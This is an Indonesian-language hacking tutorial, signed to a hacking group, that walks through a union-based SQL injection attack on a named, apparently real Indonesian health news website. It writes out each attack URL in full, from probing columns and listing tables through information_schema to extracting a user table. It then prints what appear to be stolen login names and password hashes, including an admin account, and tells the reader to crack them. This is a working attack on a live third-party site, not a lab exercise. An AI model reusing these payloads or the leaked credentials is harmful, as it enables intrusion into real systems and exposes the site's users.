SQL Injection

[x]

otree kemaren kita udah belajar gimana "Mendeteksi SQL Injection Vulnerability"
sekarang gw bakal buat tutor gimana ngeluarin table, column dan informasi yang ada didalamnya

[x]

contoh target kita kali ini dari dalam negeri ajah ya... :)

http://www.solusisehat.net/berita.php?id=227

keluarin magic numbernya

http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--

angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number sekarang coba kita liat versi, database dan user dari target http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7-- nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :) sekarang kita liat table2 yang ada didalam databasenya disini gw make command information_schema untuk ngeluarin table sama columnnya. http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()-- command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database() masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya nah keliatan semua table yang ada dalam databasenya kan? disini kita hanya akan mencari loginnya ajah ya... diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572 http://www.paulschou.com/tools/xlate/ <-- konvertnya disini

lalu kita keluarin columnnya

http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--

command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]

[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572

group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572

nah disini kita bisa liat column yang ada dalam table ssc_user

sekarang kita akan ngeluarin informasi dari column nama_login dan sandi

http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--

admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc

sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?

tinggal dicrack ajah deh xixixi.. :)

[x]

google.com
greetz MainHack BrotherHood

[x]